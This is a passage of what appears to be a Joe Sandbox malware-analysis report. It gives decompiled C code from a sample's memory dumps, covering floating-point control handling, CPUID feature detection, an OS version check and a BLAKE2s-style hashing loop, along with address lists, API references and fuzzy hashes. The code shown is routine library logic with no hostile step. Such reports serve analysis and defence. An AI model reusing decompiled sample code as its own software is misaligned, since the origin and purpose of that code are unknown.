										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x00a61a02
0x00a61a09
0x00a61a0e
0x00a61a14
0x00a61a17
0x00a61a1d
0x00a61a22
0x00a61a27
0x00a61a27
0x00a61a2d
0x00a61a32
0x00a61a37
0x00a61a37
0x00a61a3e
0x00a61a43
0x00a61a48
0x00a61a48
0x00a61a4f
0x00a61a54
0x00a61a59
0x00a61a59
0x00a61a60
0x00a61a65
0x00a61a6a
0x00a61a6a
0x00a61a72
0x00a61a82
0x00a61a94
0x00a61aa6
0x00a61ab9
0x00a61acb
0x00a61ad3
0x00a61ad8
0x00a61add
0x00a61add
0x00a61ae4
0x00a61ae9
0x00a61ae9
0x00a61af0
0x00a61af5
0x00a61af5
0x00a61afc
0x00a61b01
0x00a61b01
0x00a61b08
0x00a61b0d
0x00a61b0d
0x00a61b17
0x00a61b19
0x00a61b53
0x00a61b1b
0x00a61b20
0x00a61b44
0x00a61b4c
0x00a61b40
0x00a61b40
0x00a61b56
0x00a61b5d
0x00a61b5f
0x00a61b81
0x00a61b89
0x00a61b8c
0x00a61b8c
0x00a61b8e
0x00a61b8e
0x00a61b99
0x00a61b9f
0x00a61ba4
0x00a61bab
0x00a61be5
0x00a61bf0
0x00a61bf6
0x00a61bf9
0x00a61bfc
0x00a61c08
0x00a61c10
0x00a61bad
0x00a61bb0
0x00a61bbc
0x00a61bc2
0x00a61bc8
0x00a61bcb
0x00a61bd4
0x00a61bd4
0x00a61c13
0x00a61c21
0x00a61c27
0x00a61c2e
0x00a61c30
0x00a61c30
0x00a61c37
0x00a61c39
0x00a61c39
0x00a61c40
0x00a61c42
0x00a61c42
0x00a61c49
0x00a61c4b
0x00a61c4b
0x00a61c52
0x00a61c54
0x00a61c54
0x00a61c61
0x00a61c64
0x00a61c9b
0x00a61c66
0x00a61c66
0x00a61c69
0x00a61c94
0x00a61c89
0x00a61c89
0x00a61c9d
0x00a61ca5
0x00a61ca8
0x00a61cc7
0x00a61ccc
0x00a61ccc
0x00a61cce
0x00a61cd3
0x00a61cdf
0x00a61cd5
0x00a61cd8
0x00a61cd8
0x00a61ce4
0x00a61ce4
0x00a61caa
0x00a61cad
0x00a61cbc
0x00000000
0x00a61cbc
0x00a61caf
0x00a61cb2
0x00a61cb4
0x00a61cb4
0x00000000
0x00a61cb2
0x00a61c6b
0x00a61c6e
0x00a61c84
0x00000000
0x00a61c84
0x00a61c73
0x00a61c75
0x00a61c75
0x00a61c73
0x00000000
0x00a61c64
0x00a61b66
0x00a61b74
0x00a61b7c
0x00000000
0x00a61b7c
0x00a61b6a
0x00a61b6f
0x00a61b6f
0x00000000
0x00a61b6a
0x00a61b27
0x00a61b35
0x00a61b3d
0x00000000
0x00a61b3d
0x00a61b2b
0x00a61b30
0x00a61b30
0x00a61b2b

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A619EF,?,?,00000008,?,?,00A6168F,00000000), ref: 00A61C21

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0ffb1a67287a65bcf804e2685c16c023bd3e706b20a3762cd71a8a011dca4cf0
Instruction ID: 43941b34e68261b7e01a0285f9333d9a8dc4fcd724512feaa48a18ab041513f7
Opcode Fuzzy Hash: 0ffb1a67287a65bcf804e2685c16c023bd3e706b20a3762cd71a8a011dca4cf0
Instruction Fuzzy Hash: FBB129316106099FD719CF28C48AB697FF0FF45365F298658E89ACF2A1D335E992CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00A4F654 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00A4F654(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t104;

				_t90 = __edx;
				 *0xa91d20 =  *0xa91d20 & 0x00000000;
				 *0xa6e7a0 =  *0xa6e7a0 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0xa91d24;
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0xa91d24 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0xa6e7a0; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0xa91d20 = 1;
					 *0xa6e7a0 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0xa91d20 = 2;
						 *0xa6e7a0 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0xa6e7a0; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0xa91d20 = 3;
								 *0xa6e7a0 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0xa91d20 = 5;
									 *0xa6e7a0 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0xa6e7a0 =  *0xa6e7a0 | 0x00000040;
										 *0xa91d20 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t96 =  *0xa91d24 | 0x00000001;
					 *0xa91d24 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x00a4f654
0x00a4f657
0x00a4f661
0x00a4f672
0x00a4f824
0x00a4f827
0x00a4f827
0x00a4f678
0x00a4f67e
0x00a4f683
0x00a4f687
0x00a4f68b
0x00a4f68d
0x00a4f68f
0x00a4f692
0x00a4f697
0x00a4f6a0
0x00a4f6b1
0x00a4f6bc
0x00a4f6c2
0x00a4f6c3
0x00a4f6c9
0x00a4f6cc
0x00a4f6d6
0x00a4f6d9
0x00a4f6dc
0x00a4f6df
0x00a4f724
0x00a4f724
0x00a4f72a
0x00a4f72a
0x00a4f72f
0x00a4f730
0x00a4f736
0x00a4f768
0x00a4f738
0x00a4f73a
0x00a4f73b
0x00a4f741
0x00a4f744
0x00a4f746
0x00a4f749
0x00a4f74c
0x00a4f74f
0x00a4f752
0x00a4f75b
0x00a4f760
0x00a4f760
0x00a4f75b
0x00a4f76b
0x00a4f770
0x00a4f773
0x00a4f77d
0x00a4f788
0x00a4f78e
0x00a4f791
0x00a4f79b
0x00a4f7a6
0x00a4f7b2
0x00a4f7b5
0x00a4f7b8
0x00a4f7c3
0x00a4f7c8
0x00a4f7ca
0x00a4f7cf
0x00a4f7d2
0x00a4f7dc
0x00a4f7e4
0x00a4f7e9
0x00a4f7f3
0x00a4f801
0x00a4f814
0x00a4f81b
0x00a4f81b
0x00a4f801
0x00a4f7e4
0x00a4f7c8
0x00a4f7a6
0x00000000
0x00a4f823
0x00a4f6e4
0x00a4f6ee
0x00a4f719
0x00a4f71c
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00A4F66A

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: d69e0268460b6cc33e0aab3d1b06f77cfce8ffa7b850331a8a9c46ac95d37bd1
Instruction ID: 66fd97092bb1bff6143b7d8bc0171a003469ed5b8ef34ecc748d2f6bbf21c5cc
Opcode Fuzzy Hash: d69e0268460b6cc33e0aab3d1b06f77cfce8ffa7b850331a8a9c46ac95d37bd1
Instruction Fuzzy Hash: 17518275A006158FEB15CF98D9817AAB7F4FB88314F25993AD411EB350E7789901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A3B146 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A3B146() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0xa6e020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0xa710a8;
					_t13 =  *0xa710ac;
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0xa6e020 = _t12;
					 *0xa710a8 = _t6;
					 *0xa710ac = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}

0x00a3b149
0x00a3b158
0x00a3b196
0x00a3b19b
0x00a3b15a
0x00a3b160
0x00a3b16b
0x00a3b171
0x00a3b177
0x00a3b17d
0x00a3b183
0x00a3b189
0x00a3b18e
0x00a3b18e
0x00a3b1a4
0x00a3b1b3
0x00a3b1a6
0x00a3b1ac
0x00a3b1ac

APIs

GetVersionExW.KERNEL32(?), ref: 00A3B16B

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 2cd0df651ac325151b775036777fc97c8835cd17d1ad3b08b382a0d5d5aecb84
Instruction ID: ef73d92f542abcb7ab09c6897023011614ab3156b63b31c610a98b60078aaee4
Opcode Fuzzy Hash: 2cd0df651ac325151b775036777fc97c8835cd17d1ad3b08b382a0d5d5aecb84
Instruction Fuzzy Hash: 07F030B4E102088FDB18CB58EC926D673F2F748315F114295D61993390D3B0A9C68E60

Uniqueness

Uniqueness Score: -1.00%

Function 00A340FE Relevance: 1.5, Strings: 1, Instructions: 276
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E00A340FE() {
				signed int* _t187;
				void* _t190;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t216;
				signed int _t217;
				signed int _t224;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t239;
				signed int _t240;
				signed int _t245;
				signed int _t246;
				signed int _t253;
				signed int _t254;
				signed int _t256;
				signed int _t258;
				intOrPtr _t259;
				signed int _t260;
				signed int _t262;
				signed int _t263;
				signed int _t265;
				signed int _t266;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t278;
				signed int _t280;
				signed int _t283;
				signed int _t286;
				signed int _t289;
				signed int _t292;
				intOrPtr _t295;
				signed int _t297;
				signed int _t299;
				signed int _t301;
				signed int _t303;
				signed int _t305;
				signed int _t306;
				signed int _t308;
				signed int _t310;
				void* _t311;
				signed int _t320;
				signed int _t323;
				signed int _t326;
				signed int _t328;
				intOrPtr _t329;
				signed int _t331;
				signed int _t332;
				intOrPtr _t335;
				signed int _t337;
				signed int _t339;
				signed int _t342;
				signed int _t344;
				signed int _t345;
				signed int _t347;
				signed int _t348;
				intOrPtr _t349;
				intOrPtr _t350;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				intOrPtr _t355;
				signed int _t356;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				void* _t362;
				void* _t363;
				void* _t364;

				_t295 =  *((intOrPtr*)(_t362 + 0xd0));
				_t187 =  *(_t295 + 0xf8);
				_t258 =  *_t187 ^ 0x510e527f;
				_t352 = _t187[1] ^ 0x9b05688c;
				_t266 = 0x10;
				memcpy(_t362 + 0xa0,  *(_t362 + 0xe0), _t266 << 2);
				_t363 = _t362 + 0xc;
				_push(8);
				_t190 = memcpy(_t363 + 0x5c,  *(_t295 + 0xf4), 0 << 2);
				_t364 = _t363 + 0xc;
				 *(_t364 + 0x20) =  *_t190 ^ 0x1f83d9ab;
				_t272 =  *(_t364 + 0x6c);
				_t335 = 0;
				 *(_t364 + 0x28) =  *(_t190 + 4) ^ 0x5be0cd19;
				 *(_t364 + 0x1c) =  *(_t364 + 0x78);
				 *(_t364 + 0x38) =  *(_t364 + 0x74);
				 *(_t364 + 0x18) = 0x6a09e667;
				 *(_t364 + 0x24) = 0xbb67ae85;
				 *(_t364 + 0x2c) = 0x3c6ef372;
				 *(_t364 + 0x34) = 0xa54ff53a;
				 *((intOrPtr*)(_t364 + 0x14)) = 0;
				 *(_t364 + 0x30) =  *(_t364 + 0x70);
				 *(_t364 + 0x10) = _t272;
				do {
					_t27 = _t335 + 0xa636c0; // 0x3020100
					_t31 = _t364 + 0x18; // 0x6a09e667
					_t320 =  *((intOrPtr*)(_t364 + 0x9c + ( *_t27 & 0x000000ff) * 4)) + _t272 +  *(_t364 + 0x5c);
					_t297 = _t320 ^ _t258;
					_t259 =  *((intOrPtr*)(_t364 + 0x14));
					asm("rol edx, 0x10");
					_t274 =  *_t31 + _t297;
					_t337 = _t274 ^  *(_t364 + 0x10);
					asm("ror esi, 0xc");
					_t200 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xa636c1) & 0x000000ff) * 4)) + _t337 + _t320;
					 *(_t364 + 0x18) = _t200;
					_t201 = _t200 ^ _t297;
					asm("ror eax, 0x8");
					 *(_t364 + 0x3c) = _t201;
					_t202 = _t201 + _t274;
					 *(_t364 + 0x48) = _t202;
					asm("ror eax, 0x7");
					 *(_t364 + 0x50) = _t202 ^ _t337;
					_t323 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xa636c2) & 0x000000ff) * 4)) +  *(_t364 + 0x30) +  *(_t364 + 0x60);
					_t299 = _t323 ^ _t352;
					_t353 =  *(_t364 + 0x38);
					asm("rol edx, 0x10");
					_t276 =  *(_t364 + 0x24) + _t299;
					_t339 = _t276 ^  *(_t364 + 0x30);
					asm("ror esi, 0xc");
					_t208 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xa636c3) & 0x000000ff) * 4)) + _t339 + _t323;
					 *(_t364 + 0x10) = _t208;
					_t209 = _t208 ^ _t299;
					asm("ror eax, 0x8");
					 *(_t364 + 0x44) = _t209;
					_t210 = _t209 + _t276;
					 *(_t364 + 0x58) = _t210;
					asm("ror eax, 0x7");
					 *(_t364 + 0x24) = _t210 ^ _t339;
					_t342 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xa636c4) & 0x000000ff) * 4)) + _t353 +  *(_t364 + 0x64);
					_t301 = _t342 ^  *(_t364 + 0x20);
					asm("rol edx, 0x10");
					_t278 =  *(_t364 + 0x2c) + _t301;
					_t354 = _t353 ^ _t278;
					asm("ror ebp, 0xc");
					_t216 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xa636c5) & 0x000000ff) * 4)) + _t354 + _t342;
					 *(_t364 + 0x40) = _t216;
					_t217 = _t216 ^ _t301;
					asm("ror eax, 0x8");
					 *(_t364 + 0x54) = _t217;
					_t260 = _t217 + _t278;
					_t355 =  *((intOrPtr*)(_t364 + 0x14));
					asm("ror eax, 0x7");
					 *(_t364 + 0x20) = _t260 ^ _t354;
					_t326 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t355 + 0xa636c6) & 0x000000ff) * 4)) +  *(_t364 + 0x1c) +  *(_t364 + 0x68);
					_t303 = _t326 ^  *(_t364 + 0x28);
					asm("rol edx, 0x10");
					_t280 =  *(_t364 + 0x34) + _t303;
					_t344 = _t280 ^  *(_t364 + 0x1c);
					asm("ror esi, 0xc");
					_t224 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t355 + 0xa636c7) & 0x000000ff) * 4)) + _t344 + _t326;
					 *(_t364 + 0x4c) = _t224;
					_t328 = _t224 ^ _t303;
					asm("ror edi, 0x8");
					_t356 = _t328 + _t280;
					asm("ror eax, 0x7");
					 *(_t364 + 0x1c) = _t356 ^ _t344;
					_t98 = _t364 + 0x18; // 0x6a09e667
					_t283 =  *((intOrPtr*)(_t364 + 0x9c + ( *( *((intOrPtr*)(_t364 + 0x14)) + 0xa636c8) & 0x000000ff) * 4)) +  *(_t364 + 0x24) +  *_t98;
					_t305 = _t283 ^ _t328;
					_t329 =  *((intOrPtr*)(_t364 + 0x14));
					asm("rol edx, 0x10");
					_t345 = _t305 + _t260;
					_t262 = _t345 ^  *(_t364 + 0x24);
					asm("ror ebx, 0xc");
					_t232 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xa636c9) & 0x000000ff) * 4)) + _t262 + _t283;
					 *(_t364 + 0x5c) = _t232;
					_t233 = _t232 ^ _t305;
					asm("ror eax, 0x8");
					 *(_t364 + 0x28) = _t233;
					 *(_t364 + 0x98) = _t233;
					_t234 = _t233 + _t345;
					_t263 = _t262 ^ _t234;
					 *(_t364 + 0x2c) = _t234;
					 *(_t364 + 0x84) = _t234;
					asm("ror ebx, 0x7");
					 *(_t364 + 0x30) = _t263;
					 *(_t364 + 0x70) = _t263;
					_t286 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xa636ca) & 0x000000ff) * 4)) +  *(_t364 + 0x20) +  *(_t364 + 0x10);
					_t265 = _t286 ^  *(_t364 + 0x3c);
					asm("rol ebx, 0x10");
					_t306 = _t265 + _t356;
					_t358 = _t306 ^  *(_t364 + 0x20);
					asm("ror ebp, 0xc");
					_t239 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xa636cb) & 0x000000ff) * 4)) + _t358 + _t286;
					_t258 = _t265 ^ _t239;
					 *(_t364 + 0x60) = _t239;
					asm("ror ebx, 0x8");
					_t240 = _t306 + _t258;
					_t359 = _t358 ^ _t240;
					 *(_t364 + 0x34) = _t240;
					 *(_t364 + 0x88) = _t240;
					asm("ror ebp, 0x7");
					 *(_t364 + 0x38) = _t359;
					 *(_t364 + 0x74) = _t359;
					_t289 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xa636cc) & 0x000000ff) * 4)) +  *(_t364 + 0x1c) +  *(_t364 + 0x40);
					_t361 = _t289 ^  *(_t364 + 0x44);
					asm("rol ebp, 0x10");
					_t308 =  *(_t364 + 0x48) + _t361;
					_t347 = _t308 ^  *(_t364 + 0x1c);
					asm("ror esi, 0xc");
					_t245 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xa636cd) & 0x000000ff) * 4)) + _t347 + _t289;
					_t352 = _t361 ^ _t245;
					 *(_t364 + 0x64) = _t245;
					asm("ror ebp, 0x8");
					_t246 = _t308 + _t352;
					_t348 = _t347 ^ _t246;
					 *(_t364 + 0x18) = _t246;
					 *(_t364 + 0x7c) = _t246;
					asm("ror esi, 0x7");
					 *(_t364 + 0x1c) = _t348;
					 *(_t364 + 0x78) = _t348;
					_t292 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xa636ce) & 0x000000ff) * 4)) +  *(_t364 + 0x4c) +  *(_t364 + 0x50);
					_t349 =  *((intOrPtr*)(_t364 + 0x14));
					_t331 = _t292 ^  *(_t364 + 0x54);
					asm("rol edi, 0x10");
					_t310 =  *(_t364 + 0x58) + _t331;
					asm("ror eax, 0xc");
					 *(_t364 + 0x10) = _t310 ^  *(_t364 + 0x50);
					_t335 = _t349 + 0x10;
					 *((intOrPtr*)(_t364 + 0x14)) = _t335;
					_t253 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t349 + 0xa636cf) & 0x000000ff) * 4)) +  *(_t364 + 0x10) + _t292;
					_t332 = _t331 ^ _t253;
					 *(_t364 + 0x68) = _t253;
					asm("ror edi, 0x8");
					 *(_t364 + 0x20) = _t332;
					 *(_t364 + 0x94) = _t332;
					_t254 = _t310 + _t332;
					_t272 =  *(_t364 + 0x10) ^ _t254;
					 *(_t364 + 0x24) = _t254;
					asm("ror ecx, 0x7");
					 *(_t364 + 0x80) = _t254;
					 *(_t364 + 0x10) = _t272;
					 *(_t364 + 0x6c) = _t272;
				} while (_t335 <= 0x90);
				_t350 =  *((intOrPtr*)(_t364 + 0xe0));
				_t311 = 0;
				 *(_t364 + 0x8c) = _t258;
				 *(_t364 + 0x90) = _t352;
				do {
					_t256 =  *(_t364 + _t311 + 0x7c) ^  *(_t364 + _t311 + 0x5c);
					 *(_t311 +  *((intOrPtr*)(_t350 + 0xf4))) =  *(_t311 +  *((intOrPtr*)(_t350 + 0xf4))) ^ _t256;
					_t311 = _t311 + 4;
				} while (_t311 < 0x20);
				return _t256;
			}

0x00a34104
0x00a3410e
0x00a3412a
0x00a34136
0x00a3413c
0x00a3413d
0x00a3413d
0x00a34149
0x00a3414c
0x00a3414c
0x00a3415e
0x00a34162
0x00a34166
0x00a34168
0x00a34170
0x00a34178
0x00a34180
0x00a34188
0x00a34190
0x00a34198
0x00a341a0
0x00a341a4
0x00a341a8
0x00a341ac
0x00a341ac
0x00a341bc
0x00a341c0
0x00a341c6
0x00a341c8
0x00a341cc
0x00a341cf
0x00a341d3
0x00a341de
0x00a341ea
0x00a341ec
0x00a341f0
0x00a341f2
0x00a341f5
0x00a341f9
0x00a341fb
0x00a34201
0x00a34204
0x00a3421e
0x00a3422b
0x00a3422d
0x00a34231
0x00a34234
0x00a3423f
0x00a34243
0x00a34248
0x00a3424a
0x00a3424e
0x00a34250
0x00a34253
0x00a34257
0x00a34259
0x00a34263
0x00a34266
0x00a34281
0x00a34287
0x00a34292
0x00a34295
0x00a34297
0x00a34299
0x00a3429e
0x00a342a0
0x00a342a4
0x00a342a6
0x00a342a9
0x00a342ad
0x00a342b4
0x00a342b8
0x00a342bb
0x00a342d1
0x00a342de
0x00a342e6
0x00a342f0
0x00a342f4
0x00a342f8
0x00a342fd
0x00a34301
0x00a34305
0x00a34307
0x00a3430a
0x00a34311
0x00a34314
0x00a3432e
0x00a3432e
0x00a34334
0x00a34336
0x00a3433a
0x00a34344
0x00a34349
0x00a34354
0x00a34359
0x00a3435b
0x00a3435f
0x00a34361
0x00a34364
0x00a34368
0x00a3436f
0x00a34371
0x00a34373
0x00a34377
0x00a34385
0x00a34388
0x00a3438c
0x00a3439b
0x00a343a8
0x00a343ac
0x00a343b6
0x00a343bb
0x00a343bf
0x00a343c4
0x00a343c6
0x00a343c8
0x00a343cc
0x00a343cf
0x00a343d2
0x00a343d4
0x00a343d8
0x00a343e6
0x00a343e9
0x00a343ed
0x00a343fc
0x00a34402
0x00a34411
0x00a34414
0x00a3441f
0x00a34423
0x00a34428
0x00a3442a
0x00a3442c
0x00a34430
0x00a34433
0x00a3443a
0x00a3443c
0x00a34440
0x00a3444b
0x00a3444e
0x00a34452
0x00a34461
0x00a34465
0x00a3446b
0x00a3446f
0x00a34472
0x00a3447a
0x00a3447d
0x00a34488
0x00a3448b
0x00a3449a
0x00a344a0
0x00a344a2
0x00a344a6
0x00a344a9
0x00a344ad
0x00a344b4
0x00a344b7
0x00a344b9
0x00a344bd
0x00a344c0
0x00a344c7
0x00a344cb
0x00a344cf
0x00a344db
0x00a344e2
0x00a344e4
0x00a344eb
0x00a344f2
0x00a344fc
0x00a34500
0x00a34503
0x00a34506
0x00a34515

Strings

gj, xrefs: 00A341BC

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: af5f055c1a3b625bcdb52983f9cc9eceabfe5083c6b628c3e6b82dfc955092d9
Instruction ID: a071f0e966dde8faefb7e90ee95a8f5b57e659db57b8ac2bf14bf9a4cb3682a0
Opcode Fuzzy Hash: af5f055c1a3b625bcdb52983f9cc9eceabfe5083c6b628c3e6b82dfc955092d9
Instruction Fuzzy Hash: 03C14776A083418FD754CF29D88065BFBE1BFC8208F19892DE998D7311D734E945CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00A462CA Relevance: .8, Instructions: 829
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00A462CA(intOrPtr __esi) {
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				void* _t359;
				signed int _t361;
				intOrPtr _t363;
				signed int _t372;
				char _t381;
				void* _t385;
				signed int _t386;
				signed int _t387;
				intOrPtr _t389;
				signed int _t399;
				char _t408;
				unsigned int _t409;
				void* _t417;
				signed int _t418;
				signed int _t419;
				intOrPtr _t421;
				signed int _t424;
				char _t433;
				signed int _t436;
				signed int _t438;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t447;
				signed int _t448;
				signed short _t449;
				signed int _t450;
				signed int _t454;
				unsigned int _t459;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t468;
